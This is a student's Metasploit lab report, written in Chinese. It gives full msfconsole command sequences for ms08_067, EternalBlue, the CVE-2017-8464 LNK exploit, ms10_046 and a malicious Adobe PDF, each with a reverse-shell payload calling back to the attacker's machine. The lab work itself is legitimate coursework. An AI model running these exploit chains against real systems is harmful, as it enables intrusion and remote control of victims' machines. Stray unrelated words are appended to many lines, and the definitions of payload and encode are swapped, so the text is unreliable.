Exp5 MSF基礎應用 20164309 歐陽彧驍

 

1.實驗內容

1.0Armitage初體驗

kali端輸入 armitage 啓動armitagelinux

發現開啓失敗,更根據提示先輸入 /etc/init.d/postgresql start ,打開postgresql服務再進入armitagesql

更改端口爲學號4309,其餘選項默認不變shell

 

進入界面發現沒有能夠攻擊的主機windows

 

選擇上方菜單欄hosts-nmap scan-quick scan(os detect)進行掃描api

對虛擬機所在的網段進行掃描瀏覽器

 

選中靶機,右鍵選擇services,查看能夠利用的端口 session

右鍵選擇scan進行掃描 tcp

選擇上方菜單欄attacks-findattacks工具

 

能夠進行攻擊了!post

對win7端攻擊失敗後,我增添了一臺xp sp3繼續進行實驗;

選中目標主機右鍵attack-smb-ms08_067_netapi

 

在攻擊win7失敗後,我下載了一個xp進行實驗,攻擊仍然失敗,猜想應該是與xp系統的中英文版本有關,中文盜版猖獗,每次有新補丁盜版方還會貼心地給用戶打上。。。

從新下載一個windows2003 server sp2,進行相關攻擊

 

2003端仍然失敗,從新在windows 2000 sp4上實驗仍是失敗,也許不是系統版本與相關補丁的問題,多是kali上的armitage配置出現了一些問題,暫時排除不了具體緣由,仍是用老辦法msfconsole繼續實驗吧。

 

1.1三個主動攻擊實踐+成功應用任何一個輔助模塊+惟一

1.1.1 ms08_067_netapi

攻擊端:kali 2019 192.168.236.131

靶機:win 2000 sp4 192.168.236.143

輸入 msfconsole 

輸入 search ms08_067 ,查找可用的exploit

輸入 use exploit/windows/smb/ms08_067_netapi 

 輸入 show payloads  對可以使用的payload進行查找,這裏我使用generic/shell_reverse_tcp

 

輸入 set payload generic/shell_reverse_tcp 

配置攻擊源地址源端口與目的地址 

set RHOST 192.168.236.143
set LPORT 4309
set LHOST 192.168.236.131 

輸入 show options 查看具體信息

 

輸入 exploit 進行滲透攻擊

攻擊成功 

1.1.2 ms17_010_eternalblue+ auxiliary輔助模塊掃描

攻擊端:kali-linux-2019.1-amd64 ip:192.168.236.131

靶機:Win 7 旗艦版 ip:192.168.236.128

仍是沒有死心,打算再次使用armitage實驗。

選中靶機,在armitage左側目錄中選擇exploit-windows-smb-ms_010_eternalblue

看似是攻擊成功了,可是在鏈接sessions與調用meterpreter shell是出現了問題,看來應該是我kali中armitage工具不夠完善。仍是乖乖滾回去用msf吧。

 進入msfconsole

輸入 search ms17 type: auxiliary platform:windows 查找永恆之藍的auxiliary輔助模塊掃描指令

輸入 use auxiliary/scanner/smb/smb_ms17_010  

輸入 set RHOSTS 192.168.239.129  設置目標地址

輸入 run 進行掃描

可以創建鏈接,開始正式攻擊

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/shell/reverse_tcp
set RHOST 192.168.236.128
set LPORT 4309
set LHOST 192.168.236.131
show options
exploit

攻擊成功。 

1.1.3 cve 2017_8464 (震網三代) (惟一)

use exploit/windows/fileformat/cve_2017_8464_lnk_rce
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.236.131
exploit

輸入 cp -r /root/.msf4/local/ /root/1 將生成的文件從隱藏文件夾中複製出來

將文件導出至U盤,鏈接到靶機中。

 

kali端進行監聽:

search multi/handler
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.236.131
run

在靶機運行U盤中的FlashPlayerCPLAPP.cpl

攻擊成功。

 

1.2 一個針對瀏覽器的攻擊:ms10_046

攻擊端:kali-linux-2019.1-amd64 ip:192.168.236.131

靶機:Win xp ps3 ip:192.168.236.134

 進入msfconsole

輸入 search ms10_046 

輸入 use exploit/windows/browser/ms10_046_shortcut_icon_dllloader 

 

set payload windows/meterpreter/reverse_http
set RHOST 192.168.236.134
set LPORT 4309
set LHOST 192.168.236.131
show options
exploit

靶機鏈接http://192.168.236.131:80/

輸入  session -i 1  鏈接id爲1的session獲取shell

 

攻擊成功。

1.3 一個針對客戶端的攻擊adobe_pdf_embedded_exe

攻擊端:kali-linux-2019.1-amd64 ip:192.168.236.131

靶機:Win xp ps3 ip:192.168.236.134

 進入msfconsole

輸入 search adobe type:exploit platform:windows 查找可用漏洞,這裏我選擇了adobe_pdf_embedded_exe

use exploit/windows/fileformat/adobe_pdf_embedded_exe

show payloads 

 

Set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.236.134
set RHOST 192.168.236.134
set LPORT 4309
set LHOST 192.168.236.131
set FILENAME 20164309.pdf
show options
exploit

生成文件20164309.pdf

使用nc將文件傳輸到靶機中

ncat.exe -lv 4309 > 20164309.pdf
nc 192.168.236.134 4309 < 20164309.pdf

攻擊機中進行監聽

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp 
set LHOST 192.168.236.131
set LPORT 4309 
exploit

靶機中打開文件,攻擊成功。

2.基礎問題回答

用本身的話解釋什麼是exploit,payload,encode.

 Exploit:「利用」,經過漏洞來攻擊受害者,也就是拉貨的馬;

Payload:「編碼」,去掉「壞字符」,爲滲透攻擊作準備;改變特徵碼,起到免殺做用;也就是貨車;

Encode:「有效負載」、「shellcode」,可以在受害者環境中進行操做,也就是裝貨的車箱。

整個攻擊過程就是馬拉着裝滿貨物的車送往目的地。

 

 

 3.實踐總結體會

3.1總結體會

本次實驗是我歷時最長的一次實驗,也是收穫最大的一次實驗。包括實驗報告的撰寫實驗五一共花費了我四個晚上的時間,讓我深深明白了什麼是自學。在實驗的開始我打算圖方便使用armitage進行自動化攻擊,致使我在不停下載與更換虛擬機上浪費了過多的時間,最後仍是沒有排除沒法成功應用armitage。其實我還嘗試了WebExec(CVE-2018-15442)與mssql_payload但均以失敗了結,這也讓我感覺到了我能力的不足。

3.2離實戰還缺些什麼技術或步驟

 缺的東西大了去了,以個人水平只是到應用msf工具的水平,還不能詳細的闡述攻擊的原理;而且meterpreter庫中更新不及時,不少漏洞都及時被windows官方發現與修復,實戰性不強;同時像payload的編寫、encode的設計咱們都沒有能力實現,致使攻擊方法單一,水準不夠高。

相關文章
相關標籤/搜索